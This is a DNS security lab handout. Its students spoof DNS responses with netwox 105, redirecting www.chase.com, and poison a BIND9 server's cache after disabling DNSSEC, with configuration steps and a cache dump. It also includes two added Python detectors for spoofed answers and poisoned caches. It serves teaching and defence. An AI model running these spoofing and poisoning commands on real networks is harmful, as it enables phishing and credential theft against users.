
DNS LAB

1- Run three (3) virtual machines (VMs): Server (this will be the DNS server), Client and Attacker

2- Get the IP address of each VM using the ifconfig command and record that address

# remember the IP address for each machine for future use


$ Server IP: 10.0.2.6
$ Client IP: 10.0.2.5
$ Attacker IP: 10.0.2.7

3- The “example.com” domain name is reserved for use in documentation and educational
purposes, and is not owned by anybody, so it is safe to use it for attacks.

====================================================================================

Task 1: modify the /etc/hosts file on the Client machine


1.1 $ sudo gedit /etc/hosts

1.2 Add the following line to /etc/hosts file

127.0.0.1 www.syr.edu

1.3 Save and then run the browser and type www.syr.edu
You should see the local server and not the Syracuse University server

1|P A G E ISAURA LOPEZ



1.4 You may also want to try putting the IP address of facebook.com in place of 127.0.0.1 for www.syr.edu and saving. When you type www.syr.edu in the URL bar, the Facebook page will be shown (you need to clear the browser's history first).

Task 2: Set up the machine that the user will ask for IP addresses **on the Client machine**
2.1 Go to System Settings (from the left bar or search for System Setting)

2.2 Click "System Settings" -> "Network"

2.3 Click "Options" in "Wired" Tab

2.4 Select "IPv4 Settings" -> "Method" -> "Automatic (DHCP) addresses only" and fill in only the "DNS Servers" entry with the IP address of the DNS server (your Server VM).

2.5 Click the "Network Icon" in the top right corner and select "Wired Connection X".
This refreshes the wired network connection and applies the changes.

2.6 Linux command that asks for the IP address of a given domain name **on the user (Client) machine**

$ dig www.example.com


2.7 Open www.example.com in a web browser

Task 3: Set up the victim **local DNS server**

- We will work on the Server VM
- All virtual machines have BIND9 (an open source DNS server). It can be installed on a Linux-based machine with the command $ sudo apt-get install bind9 (if you do not have it)
- You are given the file example.com.db. This is the zone file; the actual DNS resolution data is kept in the zone file

3.1 Copy example.com.db to the folder /var/cache/bind/ on the Server VM

3.1.1 You can copy the file into your home directory on the VM first

3.1.2 $ sudo cp example.com.db /var/cache/bind/

3.1.3 Open the file example.com.db to see what it looks like

$ sudo gedit /var/cache/bind/example.com.db


3.2 Link the configuration file to example.com.db


3.2.1 Type the command in the terminal to modify the file /etc/bind/named.conf.local

$ sudo gedit /etc/bind/named.conf.local

3.2.2 Add the following 4 lines at the end:

zone "example.com" {
type master;
file "/var/cache/bind/example.com.db";
};

3.2.3 Save and exit the text editor

3.3 Restart bind9 so the changes take effect.

$ sudo service bind9 restart

3.4 Verify from the user (Client) VM by typing the command that queries the IP for www.example.com

$ dig www.example.com


Task 4: Directly Sniffing & Spoofing DNS Requests to User

Notes

- The Server machine has not been compromised, so attackers cannot directly change the DNS query process. However, if attackers are on the same local area network as the victim, they can still do great damage.
- When a user types the name of a web site (a host name, such as www.example.com) in a web browser, the user's computer issues a DNS request to the DNS server to resolve the IP address of the host name. After hearing this DNS request, the attackers can spoof a fake DNS response.

4.1 Sniffing and spoofing can be done with www.example.com, but we would rather deal with a more interesting host name like www.chase.com

4.2 Run the following command on the attacker machine

$ sudo netwox 105 --hostname "www.chase.com" --hostnameip 157.240.17.35 --authns "ns.facebook.com" --authnsip 157.240.17.35

4.3 From the user machine, open Firefox and type www.chase.com (do not forget the www). What do you see?!!


Notes

- 105 is the netwox module that sniffs DNS queries and sends DNS answers
- This attack sniffs for users trying to access www.chase.com and forwards them to facebook.com (IP address 157.240.17.35)
- In a harmful attack, the attacker would build a malicious web site that looks very similar to www.chase.com and forward users to it in order to collect their Chase bank user names and passwords

4.4 Stop the attack on the attacker side using Ctrl+c

4.5 Clear the history of Firefox on the user machine (you may need to close and reopen it). Then browse to www.chase.com again.
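The notes above describe the race a sniff-and-spoof tool creates: the forged answer reaches the Client VM before the genuine one. The following added example (not part of the lab handout) shows how a defender watching DNS traffic on the Client VM could flag that race. The response records are constructed, RESOLVER_IP is the lab's Server VM, and 203.0.113.10 / 203.0.113.20 are placeholder addresses standing in for the real ones.

```python
from collections import defaultdict
from dataclasses import dataclass

RESOLVER_IP = "10.0.2.6"  # the lab's Server VM, the only legitimate answer source

@dataclass(frozen=True)
class DnsResponse:
    ts: float     # seconds since capture start
    txid: int     # 16-bit DNS transaction ID
    qname: str
    src_ip: str   # source address of the UDP packet
    rdata: str    # A record carried in the answer
    ttl: int

# Constructed sample of responses seen by the Client VM (not a real capture).
# Query 0x1a2b gets a forged answer first, then the genuine one from the server;
# 203.0.113.10 and 203.0.113.20 are placeholders for the real addresses.
SAMPLE = [
    DnsResponse(0.010, 0x1a2b, "www.chase.com", RESOLVER_IP, "157.240.17.35", 19000),
    DnsResponse(0.045, 0x1a2b, "www.chase.com", RESOLVER_IP, "203.0.113.10", 300),
    DnsResponse(1.200, 0x3c4d, "www.example.com", RESOLVER_IP, "203.0.113.20", 3600),
    DnsResponse(2.500, 0x5e6f, "www.chase.com", "10.0.2.7", "157.240.17.35", 19000),
]

def find_spoof_candidates(responses, window=2.0):
    """Alert on answers not sent by the configured resolver, and on a query ID
    that received two different answers within `window` seconds."""
    by_query = defaultdict(list)
    for r in sorted(responses, key=lambda r: r.ts):
        by_query[(r.txid, r.qname)].append(r)
    alerts = []
    for (_txid, qname), rs in by_query.items():
        alerts += [("unexpected-source", qname, r.src_ip) for r in rs if r.src_ip != RESOLVER_IP]
        first = rs[0]
        for later in rs[1:]:
            if later.rdata != first.rdata and later.ts - first.ts <= window:
                alerts.append(("conflicting-answer", qname, f"{first.rdata} vs {later.rdata}"))
    return alerts
```

The first alert is the signature of the attack in Task 4: one transaction ID, two different A records, a few milliseconds apart.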


Task 5: Local DNS cache poisoning


Notes

- The above attack targets the user's machine. To achieve a long-lasting effect, every time the user's machine sends out a DNS query for www.chase.com (or www.example.com), the attacker's machine must send out a spoofed DNS response. This is not very efficient; there is a much better way to conduct the attack, by targeting the DNS server (the Server VM) instead of the user's machine.
- When a DNS server (call it Apollo) receives a query, if the host name is not within Apollo's domain, it asks other DNS servers to get the host name resolved. Note that in our lab setup the domain of our DNS server is example.com; therefore, for DNS queries of other domains (e.g. www.google.com, www.chase.com), the DNS server Apollo asks other DNS servers. However, before Apollo asks other DNS servers, it first looks for the answer in its own cache; if the answer is there, Apollo simply replies with the information from its cache. If the answer is not in the cache, the DNS server tries to get the answer from other DNS servers. When Apollo gets the answer, it stores the answer in the cache, so next time there is no need to ask other DNS servers.
- Therefore, if attackers can spoof the response from other DNS servers, Apollo will keep the spoofed response in its cache for a certain period of time. Next time a user's machine wants to resolve the same host name, Apollo will use the spoofed response in the cache to reply. This way, attackers only need to spoof once, and the impact lasts until the cached information expires. This attack is called DNS cache poisoning.

5.1 On the Server machine, update the named.conf.options file

- The DNS server reads the configuration file /etc/bind/named.conf to start.
- This configuration file usually includes an options file called /etc/bind/named.conf.options

5.2 Open the file /etc/bind/named.conf to see the include line for /etc/bind/named.conf.options

$ sudo gedit /etc/bind/named.conf

5.3 Open the file /etc/bind/named.conf.options

$ sudo gedit /etc/bind/named.conf.options

5.4 Make the following modifications to the options file /etc/bind/named.conf.options

a) Disable the DNSSEC protection. This protection, which is based on PKI techniques, defeats the sniff & spoof attack. Comment out dnssec-validation and set dnssec-enable to no:

#dnssec-validation auto;
dnssec-enable no; //(do not forget the semi-colon ";")

b) Give the path for the dump file:

dump-file "/var/cache/bind/dump.db"; //(do not forget the semi-colon ";")

c) Your file should look like (image removed for space)

//Note: The file /var/cache/bind/dump.db is used to dump DNS server’s cache

5.5 Restart the DNS server

$ sudo service bind9 restart

//If you see [fail], your named.conf.options file has an error. You have to fix it first

5.6 Flush the cache of the server every time before the attack. On the Server machine type:

$ sudo rndc flush


5.7 On the attacker machine, run the following command

$ sudo netwox 105 --hostname "www.example.net" --hostnameip 10.20.30.40 --authns "ns.example.net" --authnsip 10.20.30.50 --ttl 19000 --filter "src host <YOUR_SERVER IP>" --spoofip "raw"

# !!! Replace <YOUR_SERVER IP> with your own server's IP address (the Server VM)

5.8 On the client machine query the IP address of www.example.net

$ dig www.example.net

5.9 Close the attack on the attacker machine

5.10 Dig again on the client machine

$ dig www.example.net

5.11 Dump the cache on the Server machine to the dump file

$ sudo rndc dumpdb -cache

5.12 Open the dump file to see the cache


$ gedit /var/cache/bind/dump.db

;
; Start view _default
;
;
; Cache dump of view '_default' (cache _default)
;
$DATE 20170928025741
; authanswer
. 18876 IN NS ns.example.net.
; authanswer
daisy.ubuntu.com. 18876 A 10.20.30.40
; glue
net. 172685 NS a.gtld-servers.net.
172685 NS b.gtld-servers.net.
172685 NS c.gtld-servers.net.
172685 NS d.gtld-servers.net.
172685 NS e.gtld-servers.net.
172685 NS f.gtld-servers.net.
172685 NS g.gtld-servers.net.
172685 NS h.gtld-servers.net.
172685 NS i.gtld-servers.net.
172685 NS j.gtld-servers.net.
172685 NS k.gtld-servers.net.
172685 NS l.gtld-servers.net.
172685 NS m.gtld-servers.net.
; glue
example.net. 172685 NS a.iana-servers.net.
172685 NS b.iana-servers.net.
; authauthority
ns.example.net. 3485 \-ANY ;-$NXDOMAIN
; example.net. SOA sns.dns.icann.org. noc.dns.icann.org. 2017042792 7200 3600 1209600 3600
; example.net. RRSIG SOA ...
; example.net. RRSIG NSEC ...
; example.net. NSEC www.example.net. A NS SOA TXT AAAA RRSIG NSEC DNSKEY
; authanswer
www.example.net. 18885 A 10.20.30.40
;
; Address database dump
;
; ns.example.net [v4 TTL 18885] [v6 TTL 3485] [v4 success] [v6 nxdomain]
; 10.20.30.40 [srtt 238] [flags 00002000] [ttl 1685]
;
; Unassociated entries
;
;
; Bad cache
;
;
; Start view _bind
;
;
; Cache dump of view '_bind' (cache _bind)
;
$DATE 20170928025741
;
; Address database dump
;
;
; Unassociated entries
;
;
; Bad cache
;
; Dump complete

Notes

- You will see ****Bad cache****
- After stopping the attack, you may need to flush the server's cache using $ sudo rndc flush
- After flushing the cache, you can dig again on the client side to see the correct IP address of www.example.net, which is 93.184.216.34
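Two entries in the dump above give the poisoning away: the root "." has acquired an NS record pointing at ns.example.net (a name that is not a root server), and an unrelated name, daisy.ubuntu.com, resolves to the same 10.20.30.40 as the spoofed www.example.net. As an added example that is not part of the lab, here is a small Python parser for the rndc dumpdb -cache format, with those two checks written as a defender's review of the dump. The DUMP excerpt is constructed from the page's dump; the shared-address check is a heuristic to review by hand, since CDNs and virtual hosting legitimately put many names on one address.

```python
from collections import defaultdict

ROOT_NS_SUFFIX = ".root-servers.net."  # genuine root NS names end with this

# Constructed excerpt in the dump format shown above (not a real capture).
DUMP = r"""
; authanswer
. 18876 IN NS ns.example.net.
daisy.ubuntu.com. 18876 A 10.20.30.40
net. 172685 NS a.gtld-servers.net.
172685 NS b.gtld-servers.net.
86285 DS 35886 8 2 (
DEADBEEF )
ns.example.net. 3485 \-ANY ;-$NXDOMAIN
www.example.net. 18885 A 10.20.30.40
"""

def parse_cache_dump(text):
    """Return (owner, ttl, type, rdata) tuples; a bare-TTL line inherits the previous owner."""
    records, owner, in_paren = [], None, False
    for line in text.splitlines():
        if in_paren:                        # swallow the rest of a ( ... ) record
            in_paren = ")" not in line
            continue
        if not line or line[0] in ";$":     # comments, section labels, $DATE
            continue
        tok = line.split()
        if not tok[0].isdigit():            # line names its own owner
            owner, tok = tok[0], tok[1:]
        ttl, tok = int(tok[0]), tok[1:]
        if tok[0] == "IN":
            tok = tok[1:]
        rtype, rdata = tok[0], " ".join(tok[1:])
        in_paren = rdata.endswith("(")
        if not rtype.startswith("\\"):      # skip \-ANY negative-cache markers
            records.append((owner, ttl, rtype, rdata))
    return records

def find_poisoning_signs(records):
    """Flag a root NS outside the root-server set and one address shared by several names."""
    alerts, names_by_addr = [], defaultdict(set)
    for owner, _ttl, rtype, rdata in records:
        if owner == "." and rtype == "NS" and not rdata.endswith(ROOT_NS_SUFFIX):
            alerts.append(("foreign-root-ns", owner, rdata))
        if rtype == "A":
            names_by_addr[rdata].add(owner)
    for addr, names in sorted(names_by_addr.items()):
        if len(names) > 1:
            alerts.append(("shared-address", addr, " ".join(sorted(names))))
    return alerts
```

Run it over the real /var/cache/bind/dump.db with open(...).read() in place of DUMP; with DNSSEC validation left enabled, as the lab notes, the forged records would have been rejected before reaching the cache.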
